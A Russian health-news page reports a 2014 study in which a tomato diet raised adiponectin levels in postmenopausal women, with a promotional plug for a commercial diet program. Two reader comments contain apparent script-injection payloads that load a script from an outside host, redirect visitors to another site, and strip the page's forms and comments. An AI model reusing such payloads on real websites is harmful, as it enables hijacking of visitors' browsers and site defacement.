Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Какой овощ поможет похуде...  >>  Какой овощ поможет похудеть и не заболеть раком груди
 
Обратная связь
 

Какой овощ поможет похудеть и не заболеть раком груди

Размер шрифта
19 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые считают, что увеличение количества томатов в дневном рационе может снизить риск развития рака груди у женщин после климакса.

Какой овощ поможет похудеть и не заболеть раком груди

Работа со столь необычным содержанием была опубликована в официальном журнале Американского Эндокринологического Сообщества – Journal of Clinical Endocrinology & Metabolism.

У женщин после менопаузы риск развития рака груди повышается параллельно с массой тела. Исследователи обнаружили, что помидоры могут оказывать позитивный эффект на гормональный баланс в организме, что положительно влияет на обмен жиров и углеводов.

«Цифры, полученные нами при статистической обработке данных, были крайне убедительны: томаты приносят колоссальную пользу для женского здоровья даже при кратковременном употреблении», – рассказывает доктор Адана Лланос, доцент кафедры эпидемиологии Ратгерского университета (штат Нью-Джерси, США), ведущий автор исследования. «В принципе, тоже самое касается многих фруктов и овощей, в которых содержатся незаменимые питательные вещества, витамины, минералы и фитосоединения, такие как ликопин. Все вышеперечисленное чрезвычайно полезно. Основываясь на наших результатах, мы решительно рекомендуем как минимум раз в день кушать фрукты и овощи; это обеспечит некоторый профилактический эффект в отношении рака груди, особенно у лиц в группе риска».

В исследовании приняли участие семьдесят женщин в постменопаузе. В течение десяти недель испытуемые потребляли помидоры или продукты на их основе с суточным содержанием ликопина не менее 25 миллиграмм. Далее следовал другой десятинедельный временной промежуток, в течение которого участницы ели не менее 40 грамм соевого белка ежедневно. Перед каждым из этих тестовых периодов женщинам было предписано воздерживаться от помидоров и сои в течение двух недель.

Выяснилось, что «томатная диета» приводила к росту на 9% уровня адипонектина – гормона, который участвует в регуляции процессов обмена веществ. Данный эффект был выражен в несколько большей степени  у женщин с низким индексом массы тела (ИМТ).

«Томатная диета приводила к наиболее позитивным результатам у женщин с низким или нормальным весом. Этот факт является дополнительным свидетельством в пользу того, что профилактика ожирения крайне важна для женского здоровья», – говорит доктор Лланос.

Соевая же диета, напротив, приводила к снижению уровня адипонектина. Это противоречит исходной теории авторов, согласно которой азиатские женщины реже заболевают раком груди именно благодаря большой доле соевых продуктов в рационе. Истинная причина еще будет раскрыта в будущем.

Таким образом, ешьте томаты и худейте, чтобы снизить риск развития рака груди. И мы вам в этом поможем: с помощью«Диеты Елены Малышевой» сбросить лишнее стало как никогда просто и приятно.

Другие статьи о женском здоровье читайте на страницах нашего одноименного специального проекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:50

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Жир вызывает рак! Как похудеть и остаться в живых?!   В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда, которая заставляет вас ЕСТЬ

Тесты

1
Какое мороженное съесть, чтобы похудеть
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.